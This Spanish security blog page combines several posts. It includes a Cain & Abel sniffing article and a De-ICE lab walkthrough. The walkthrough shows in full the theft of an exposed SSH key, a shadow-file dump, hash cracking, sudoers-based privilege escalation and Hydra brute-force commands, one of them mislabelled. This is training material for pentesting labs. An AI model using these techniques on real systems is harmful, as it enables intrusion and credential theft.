Sin más, el solucionario de Carlos Rodallega

@crodallega says:

Una vez ha iniciado los entonos target y atacante iniciamos realizando un típico barrido de pings root@bt:~/hackademic2# nmap -sP 192.168.209.1-255

Donde se identifican 3 host activos (pueden haber mas) de los cuales descartamos los 2 últimos debido a que el de IP .131 es nuestra maquina atacante y el .254 es la interface que configura vmware cuando usamos el modo solo host, haciendo uso de la misma herramienta (nmap) y con base en la información recolectada realizamos un escaneo de puertos a partir del cual tenemos 2 puertos activos 1 abierto y 1 filtrado.

Continua leyendo el solucionario desde el blog de @crodallega >>

Sí, esa es la razón de ser de este escrito,  “Como CAIN& ABEL no hay otro igual” y no estoy haciendo referencia a “Holy Bible” y la Narración del chicho Bueno y el chico Malo con su sacrificio ante Dios.

Como leerán y verán a continuación Cain es un chico tan bueno como Abel.

En realidad estoy haciendo referencia al excelente software creado por el Señor Massimiliano Montoro y su grandioso Web Site .

Rondaba en mi cabeza la intención de escribir desde hace mucho rato sobre este maravilloso aplicativo, puesto que se convirtió en uno más de las armas de mi arsenal para Análisis de Seguridad, el cual no puede faltar en ningún de mis Test de Intrusión Interno, apelando a sus excelentes métodos para la recuperación y desciframiento de contraseñas, contribuyendo así  en la consecución de hallazgos que nos fortalezcan nuestras evidencias de auditoría de seguridad.

Antes de pasar a las imágenes de evidencia, una breve descripción de lo que es CAIN&ABEL  para quien no conozca de esta maravillosa herramienta Multiuso.

“Caín y Abel es una herramienta de recuperación de contraseña para sistemas operativos de Microsoft.  Permite la recuperación fácil de diversos tipo de contraseñas por métodos de sinfín de la red (olfateo de red), craqueo contraseñas cifradas utilizando ataques de  diccionario, fuerza bruta y ataques de criptoanálisis, permite grabar conversaciones de VoIP, descodificar contraseñas, recuperar claves de la red inalámbrica, revelar  contraseñas en Text Box, caché las contraseñas en Windows y el análisis de protocolos de enrutamiento.

La última versión es más rápida y contiene muchas características nuevas como APR (Arp Poison Routing) que permite el rastreo en cambió de LANs y ataques Man-in-the-Middle.

El sniffer en esta versión también puede analizar los protocolos cifrados como SSH-1 y HTTPS y contiene los filtros para capturar las credenciales de una amplia gama de mecanismos de autenticación. “

Bien y si no me crees, échale un vistazo a las siguientes evidencias. El orden de los factores no altera el producto  xDDD

No pretendo entregar un manual del producto, el cual puedes descargar de aquí View Cain & Abel on-line User Manual Así que iré detallando cada evidencia sin establecer un nivel o criterio de importancia.

Corresponden a diversos proyectos ejecutados de los cuales tratare de incluir lo que considere más relevante, ya que si me doy a la tarea de subir todo, creo que este Artículo no me alcanzaría para su inclusión.

Enumeración de Equipos o Sondeo de Red.

Si hacemos uso de Su pestaña de Host y Network tenemos la posibilidad de Sondear o enumerar la Red de la cual pertenecemos al segmento de Red o tenemos enrutamiento alguno.  De igual forma tratar de acceder a recursos compartidos, Bases de Datos, o registros de Windows en los equipos.

Recursos Compartidos, acceso por clave o usuario Anonymous

Llaves de Registro y Recursos Compartidos.

Enumeración de usuarios, registro y recursos compartidos

Enumeración de Servicios.

Registro del sistema

En algunas ocasiones nuestra estación de trabajo es controlada o nos aplican restricciones con medidas como Vlans o Acls (Listas de Control de Accesos), etc.  Algunas formas de tratar de evadirlas es montando una Maquina virtual y estableciendo una configuración estática o dinámica, un Ip spoofing,  mac spoofing,  con una mac diferente para saltar el control de Acls por MAC, como se muestra a continuación capturando credenciales de autenticación (login y password) en  tramas de HTTP una vez se ha iniciado un ARP Poisoning.

Captura de tramas HTTP con credenciales y comportamientos de navegación, si tienes algún sitio prohibido de navegación, aquí te darás cuenta que te están saltando el proxy o el Web Content.

Captura de credenciales de autenticación servicio FTP, en conexiones FTP

Explotando el servicio  ;P

O lo prefieres visualizar así 

Captura de tramas del protocolo SIP (Session Initiation Protocol) en un sistema Asterisk (VoiP).

Captura de tramas protocolo POP3 (servicio de correo interno)

Captura de tramas protocolo SMB. Indicio excelente para aplicar un SMB Relay 

Captura credenciales Oracle (TNS) ciframiento tipo DES !!

Captura  tramas de VoIP

Volcado de la SAM en una estación de trabajo vulnerada por su baja seguridad a nivel de LOCALHOST.

Proceso de ARP poisong y MITM (Man In The Middle) con Cain

Captura de tramas http de archivos, aplicativos que pueden ser modificados On line.

Credenciales de autenticación conexión es Wirelles tomadas de los Cache Passwords de un equipo vulnerado a nivel de Localhost,  en donde se ha instalado Cain&Abel.

Creo que no te gustaría que te encontraran visitando sitios de tu preferencia xDD.

Aclaro que no tengo nada contra la definición de Género o estilos de Vida. Pero con esta sociedad de doble moral, no creo que te guste que encuentren que visitas estos sitios. El problema es que este es un equipo corporativo de trabajo.

Información de los Windows Mail Passwords del Cached Passwords del equipo.

Información de los Credential Manager del Cached Passwords del equipo.

Información del Protected Storage del Cached Passwords del equipo.

Información del Dialup Password del Cached Passwords del equipo

Captura de Credential Manager en Cached Passwords, credencial de controlador de Dominio Maestro.

Captura de Certificados

Función Cracker de Cain&Abel en donde puedes utilizar varios métodos para descifrar los hash de las contraseñas por medio de ataques por diccionario, fuera bruta, intentos, etc. Adicionalmente puedes subir diccionarios personalizados o las tablas de Rainbow Tables.

Capturas de sesión de Telnet

Descifrado de Hash de VNC levantadas del registro de Windows

Esto es una belleza como un Santo Grial, un LDAP abierto de Patitas       Esperando ser coronado

Capturas de tramas protocolo  SMNP

O si tu intención es una Denegación de Servicios (DoS)

Huyyyyy  

La verdad dejemos hasta aquí porque me canse y se me atrasaron algunas vainas de trabajo y académicas……..

He probado algunas otras opciones como el Cracking de Wirelles, Accesos por RDP, desciframiento de BD, Conexión a BD, Desciframiento de CCDU, Traceroute, RSA Token Security ID, Siskey Decoder, DecoderBase64, Cisco VPN Password y Cisco Decode Password. Algunas me han funcionado otras no!!.  A lo mejor por falta de conocimiento o ser mas diestro con la herramienta. Creo que no conozco más del 50% de la misma pero ya puedes medir su potencial con los hallazgos de las evidencias anteriores.

Como puedes ver Cain también es un chico bueno como Abel!!! 

Y como su título lo dice no he encontrado herramienta alguna similar para Linux, razón por la cual mantengo mi partición dual Win/BT algunas vainas sobre Windows como algunas herramientas forenses  y de seguridad.

Ahora, no vamos a volver con el mismo cuento que siempre me tomo que usa Dsniff, Ettercap, Wireshark  que combínalo con scripts o con otras herramientas. Ni de esta forma alcanza el gran potencial de esta maravillosa herramienta. Eso si recomiendo,  si encuentras algo similar por favor no dudes en contactarme que es de mi especial interés!!

Con gratitud  se escribió este artículo especialmente para el proyecto Sec-Track por permitirme participar de él. Congratulations mi gran amigo 4v4t4r por tan excelente iniciativa de seguridad.

Espero que sean de su agrado estas líneas, que como cosa rara me extendí más de lo que esperaba, aunque como lo dije desde el principio tratare de ser breve, tratando de mostrar el potencial de la herramienta.

No me queda más que despedirme, agradecerles a todos por invertir su tiempo en leer un poco estas líneas de conocimiento.

Bytes

Dino

PD: Agradecimientos al Señor Massimiliano Montoro y su grandioso Web Site

PD2: Se publica también en mi Blog

———–

Nota de 4v4t4r:

@d7n0

• Administrador de Empresas
• Gerencia en Consultoría Empresarial
• Profesional en Sistemas de Información
• Especialización Administración de la Información
• Veinte (20) años de experiencia en Sistemas e Informática
• Diez (10) años de experiencia en Seguridad Informática
• Miembro activo de La Comunidad DragonJAR.
• Miembro activo de la Comunidad Team SecurityIT
• Coordinador del grupo SWAT de Hacking Etico
• Columnista de diversos articulos de seguridad Informatica, Hardening, Análisis Forense, Hacking Etico en revistas Electrónicas, como Hackerss.com, Dragonjar.org.
• Analista en Seguridad Informática (Freelance)
• Investigador Informática Forense (Freelance)
• Vinculación con la Empresa P@ssword S.A. Desde hace tres años desarrollando proyectos de Seguridad Informática (Aseguramiento, Análisis de Seguridad, Análisis Forense) a Organizaciones Gubernamentales, Estatales, Sector Público y Privado.
• Asesor y Consultor de TICS
• Capacitador Diplomados de Seguridad Informatica en Universidades (Universidad Cooperativa, Universidad Libre de Colombia, Universidad Antonio Nariño, Universidad del Pacifico)
• Capacitador cursos de Ethical Hacking en Centros de Entrenamiento de Alta Tecnologia CETEC, Itech Learning
• Ponente Nacional en temas de Seguridad Informática en diversos eventos, seminarios y Universidades (Universidad Javeriana, Universidad Santiago de Cali, Universidad Libre, Universidad Autonoma de Popayan, UNAD de Neiva).

Menu – File – New Virtual Machine

Continuamos el paso a paso del wizard de creación de máquinas virtuales ilustado en las siguientes imágenes.

Finalmente ejecutamos la nueva máquina creada, desde allí podemos seleccionar el sistema de inicio o instalación (si preferimos hacerlo):

Automaticamente inicia DVWA

Si verificamos nuestra configuración de red, podremos identificar la dirección IP en la cual ya se encuentra disponible el entorno.

Si escribimos dicha dirección IP en nuestro navegador, nos encontraremos con la página de login de DVWA.

Además si deseamos podemos trabajar desde el propio LiveCD, para ello simplemente ejecutamos el entorno gráfico de DVWA y el navegador web. Este automáticamente abrirá la página de login del Framework.

Iniciamos sesión en DVWA (user: admin pass: password) y nos encontraremos con todos los módulos de entrenamiento.

Veamos ahora el mismo proceso de configuración y puesta en marcha en el software para virtualziación Virtual Box.

Creación de nueva máquina y configuración de acceso a red (en mi caso NAT)

Si ejecutamos el browser desde la misma máquina en virtual box, nos encontraremos igualmente con la página de inicio del DVWA.

Finalmente veamos el proceso de implementación de DVWA en QEMU

Desde el Qemu Manager

Seleccionamos la mejor opción que se acomode a nuestras caracteristicas de red. En mi caso decidí utilizar una interfaz virtual (tap qemu).

Continuamos con la configuración normal, seleccionado la imagen ISO de DVWA

Verificamos el acceso

En próximos post veremos como realizar uno a uno cada módulo de entrenamiento…

Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun más la implementación del entorno de entrenamiento.

Entre las mejoras de esta nueva versión, se destaca la página de ayuda del entorno, la implementación de las prácticas de Blind SQL Injection y la documentación oficial del proyecto.

Las temáticas cubiertas en el Framework, son las siguientes:

Login Brute Force
XSS (Cross-Site Scripting)
LFI (Local File Inclusion)
RFI (Remote File Inclusion)
Command Execution
Upload Script
CSRF (Cross-Site Remote Forgery)
SQL Injection
Blind SQL Injection

Para más información sobre el proyecto Blog >>

Web Oficial del Proyecto >>

Descargar DVWA (ISO)(480Mb) >>

Pronto estaré publicando algunos tutoriales y video tutoriales de la implementación y desarrollo de cada uno de los niveles propuestos en el Framework, obviamente estos recursos serán generados a través de la lista de correo y de los comentarios en el Blog.

Toco este tema, debido a que a lo largo de mi carrera profesional e investigaciones relacionadas en la seguridad de la información, he realizado diferentes certificaciones y preparaciones formales en estos campos. Una de estas corresponde al título de este post.

Esta prestigiosa certificación y que muchos se atreven a nombrar como “Penetration Testing Pro: the CEH killer” es ofrecida por el equipo de eLearnSecurity en un completo paquete de entrenamiento + certificación. El objetivo a lo largo de esta exigente preparación es aprender trabajando de manera práctica en cada uno de sus módulos propuestos.

SECTION 1 WEB APPLICATION SECURITY TESTING
OVERVIEW

• Module 1: Introduction
• Module 2: Information Gathering
• Module 3: Vulnerability assessment
• Module 4: Cross site scripting
• Module 5: SQL Injection
• Module 6: Advanced Web Attacks

SECTION 2 NETWORK SECURITY TESTING
OVERVIEW

• Module 1: Information Gathering
• Module 2: Scanning
• Module 3: Enumeration
• Module 4: Sniffing and MITM attacks
• Module 5: The Exploitation show
• Module 6: Anonymity

SECTION 3 SYSTEM SECURITY
OVERVIEW

• Module 1: Introduction
• Module 2: Cryptography and Password Cracking
• Module 3: Buffer Overflow
• Module 4: Shellcoding
• Module 5: Malware
• Module 6: Rootkit coding

Los detalles del curso son:

• Online course—learn at your own pace
• 1000+ interactive slides
• Learn methodology, be a professional
• 4 hours of videos
• 3 authors—3 sections
• DVD Backtrack4 + Labs
• Silver Certification
• Qualifies you for 40 CPE

Un completo listado de las temáticas puede encontrarse en el documento Syllabus oficial.

Además de esto, en el web site The Ethical Network y en DarkNet han realizado unos completos reviews sobre el entrenamiento y la certificación, que puede ser de utilidad para quienes estén interesados en realizar este training.

Por este mismo medio estaré publicando mis experiencias, alguna parte del material de entrenamiento (videos, ppts, entornos, sources) y algunos de los ejercicios propuestos, con el objetivo de encontrar otras opiniones, sugerencias y compartir con quienes quieran parte de este valioso recurso y estén proyectando realizarlo de manera oficial.

Web oficial (Entrenamiento + Certificación) eLearnSecurity

Demo Training

Review (DarkNet)

Review (The Ethical Hacker Network)

Veamos ahora que podemos hacer con la información encontrada:

Index of /~pirrip//.ssh

 Name                    Last modified      Size  Description
 Parent Directory                             -
 id_rsa                  05-Jan-2008 20:29  1.6K
 id_rsa.pub              05-Jan-2008 20:29  393

Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.

Descarguemos los archivos:

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
–2010-06-01 02:11:32–  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 393 [text/plain]
Saving to: `id_rsa.pub’

100%[===========================================================>] 393         –.-K/s   in 0s

2010-06-01 02:11:32 (44.7 MB/s) – `id_rsa.pub’ saved [393/393]

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa
–2010-06-01 02:11:46–  http://192.168.2.101/~pirrip//.ssh/id_rsa
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1675 (1.6K) [text/plain]
Saving to: `id_rsa’

100%[===========================================================>] 1,675       –.-K/s   in 0s

2010-06-01 02:11:46 (172 MB/s) – `id_rsa’ saved [1675/1675]

root@Sec-Track:~/De-Ice2.100# ls
id_rsa  id_rsa.pub

Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh

root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/

root@Sec-Track:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts

Confirmamos que la llave corresponde al usuario pirrip

root@Sec-Track:~/.ssh# more id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== pirrip@slax

Por lo tanto realicemos la conexión al sistema objetivo!!

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
The authenticity of host ’192.168.2.100 (192.168.2.100)’ can’t be established.
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ’192.168.2.100′ (RSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for ‘/root/.ssh/id_rsa’ are too open.
It is recommended that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /root/.ssh/id_rsa
pirrip@192.168.2.100′s password:

Como vemos las llaves presentan un error de permisos… Por lo tanto cambiemos estos:

root@Sec-Track:~/.ssh# ls -la
total 20
drwx——  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
-r–r–r– 1 root root 1675 Jun  1 02:17 id_rsa
-r–r–r– 1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r–r–  1 root root 1768 Jun  1 02:21 known_hosts
root@Sec-Track:~/.ssh# chmod 000 id*
root@Sec-Track:~/.ssh# ls -la
total 20
drwx——  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
———- 1 root root 1675 Jun  1 02:17 id_rsa
———- 1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r–r–  1 root root 1768 Jun  1 02:21 known_hosts

Ahora si… Conectémonos al host

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$

Muy bien… Ya estamos dentro del sistema objetivo… Ahora como en  todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.

pirrip@slax:~$ cat /etc/passwd
root :0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
pirrip :1000:10 hilip Pirrip:/home/pirrip:/bin/bash
magwitch :1001:100:Abel Magwitch:/home/magwitch:/bin/bash
havisham :1002:100:Estella Havisham:/home/havisham:/bin/bash

Vemos como nuestro usuario pirrip tiene el ID 10… Comprobemos entonces los grupos.

pirrip@slax:/tmp$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:

Por lo tanto podremos utilizar el comando sudo

pirrip@slax:/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Lamentablemente desconocemos nuestro password.

Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp

pirrip@slax:~$ uname -r
2.6.16
pirrip@slax:~$ cd /tmp/
You have mail in /var/mail/pirrip

Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email … Veamos de que se trata

pirrip@slax:/tmp$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
“/var/mail/pirrip”: 7 messages 7 unread
>U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder
? 1
Message  1:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Will do.

?
Message  2:
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Thanks!  Glad to be here.

?
Message  3:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

I set her up with an accountus servers.  I set her password to “changeme” and will swing by tomorrow and make sure she changes her pw.

?
Message  4:
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

?
Message  5:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Hey, I’ll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

?
Message  6:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Sure – so far, she’s doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

?
Message  7:
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Regards,
Fermion Support

E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

Vemos que interesante información nos encontramos en el email 7 y 3 … Nuestro password y el de havisham!!

Intentemos nuevamente listar el contenido de passwd

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Sorry, user pirrip is not allowed to execute ‘/usr/bin/cat /etc/shadow’ as root on slax.

Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos…

pirrip@slax:/tmp$ sudo bash
Sorry, user pirrip is not allowed to execute ‘/usr/bin/bash’ as root on slax.
pirrip@slax:/tmp$ sudo sh
Sorry, user pirrip is not allowed to execute ‘/bin/sh’ as root on slax.
pirrip@slax:/tmp$ sudo ls
Sorry, user pirrip is not allowed to execute ‘/usr/bin/ls’ as root on slax.
pirrip@slax:/tmp$ sudo nano
sudo: nano: command not found
pirrip@slax:/tmp$ sudo more
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 …
pirrip@slax:/tmp$ sudo vi

Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! more y vi . Veamos que podemos hacer con estos.

pirrip@slax:/tmp$ sudo more /etc/shadow
Password:
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

Genial… Llevemos estos resultados a la herramienta de password cracking John The Ripper.

root@Sec-Track:/pentest/passwords/jtr# ./john –user=root –w=/root/passwords/verycool.lst 100.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero

Lamentablemente no hemos dado con el password de root… Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.

Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.

pirrip@slax:/tmp$ sudo vi /etc/sudoers
Password:
reading /etc/sudoers

Allí modifico los permisos para nuestro usuario pirrip

# User privilege specification
root    ALL=(ALL) ALL
pirrip  ALL=(ALL) ALL

Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando… Incluyendo el siguiente!!

pirrip@slax:/tmp$ sudo passwd root
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Ahora solo basta:

pirrip@slax:/tmp$ su
Password: ***********
root@slax:/tmp#

Para el próximo post veremos algunos otros métodos para comprometer este sistema…

Si bien es cierto que la fecha de publicación del documento está un poco antigua, también es cierto que cada uno de estos temas siempre estarán vigentes en nuestro día a día como consultores, desarrolladores e investigadores en Seguridad de la Información.

Dejo un listado con algunas de las preguntas cubiertas en el documento:

• ¿Cuáles son las amenazas más usuales en las aplicaciones Web?
• ¿Qué libros son aconsejables para aprender técnicas o prácticas de programación segura?
• Hay algún programa de entrenamiento sobre programación segura al cual pueda atender?
• ¿Qué aspectos debo recordar a la hora de diseñar las páginas de inicio de sesión (login)?
• ¿Cómo funciona la técnica MD5 con sal (salted-MD5)?
• ¿Como puede ser explotada mi función de recordatorio de contraseña?
• En la función de recordar contraseña, ¿Es mejor mostrar la contraseña o permitir al usuario reestablecerla?
• ¿Y si el atacante a plantado un registrador de tecleos (Keystroke logger) en la computadora cliente? ¿Puedo contrarestar esto?
• ¿Qué es la inyección de SQL?
• Además del usuario y contraseña, ¿qué otras variables son candidatas para la inyección de SQL en nuestras aplicaciones?
• ¿Cómo evitamos ataques de inyección de SQL?
• Estoy usando procedimientos almacenados para la autenticación, ¿soy vulnerable?
• ¿Qué información puede ser manipulada por un atacante?
• ¿Cómo manipulan los atacantes la información? ¿Qué herramientas usan?
• ¿Cómo puede usarse la memoria rápida (cache) del navegador para realizar ataques?
• ¿Qué es el XSS?
• ¿Qué información puede robar un atacante mediante XSS?
• ¿Cómo puedo evitar ataques XSS?
• ¿Cómo identifican los atacantes qué servidor Web estoy usando?
• Una vez falsificado el banner,¿puede mi servidor Web ser identificado?
• Quiero encadenar un software de tipo proxy con mi servidor proxy, ¿existen herramientas que permitan hacerlo?
• ¿No pueden ser automatizadas las pruebas? ¿Existen herramientas que pueda correr contra mi aplicación?
• ¿Dónde puedo realizar mis pruebas? ¿Existe una aplicación Web con la que pueda practicar?
• Qué son las cookies seguras?
• ¿Puede otro sitio Web robar las galletas que mi sitio Web almacena en la máquina de un usuario?
• ¿Cuál es el mejor método para transmitir identificadores de sesión: en galletas, en la URL o en variables ocultas?
• ¿Qué son los registros W3C?
• ¿Qué debo registrar en el registros de mi aplicación?
• ¿Debería usar SSL de 40 o de 128 bits?
• ¿Realmente SSL de 40 bits es inseguro?
• ¿Qué son los cortafuegos de aplicación? ¿Qué tan buenos son en realidad?
• ¿En qué consisten los registros referrer (referrer logs) y las URLs sensibles?
• ¿Quiero usar el lenguaje más seguro?¿Cuál es más recomendable?

Sitio Web oficial del proyecto FAQ OWASP

Descargar documento FAQ OWASP (PDF)

Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos:

FTP

Hydra:

root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36

SSH

Hydra:

root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36

Ncrack:

root@bt:/usr/local/share/ncrack# ncrack 192.168.1.100:22 -P /pentest/passwords/wordlists/pass.txt

Después de mucho esperar mientras se llevaba a cabo los intentos de inicio de sesión con un usuario y password válido llegamos a la conclusión de que este no es un camino viable para acceder al sistema, pues las pruebas fueron realizadas con diccionarios en un comienzo básicos y compuestos por palabras comunes hasta diccionarios bastante robustos de millones de palabras, por lo tanto podemos afirmar que las contraseñas son complejas o los mecanismos de autenticación están medianamente asegurados.

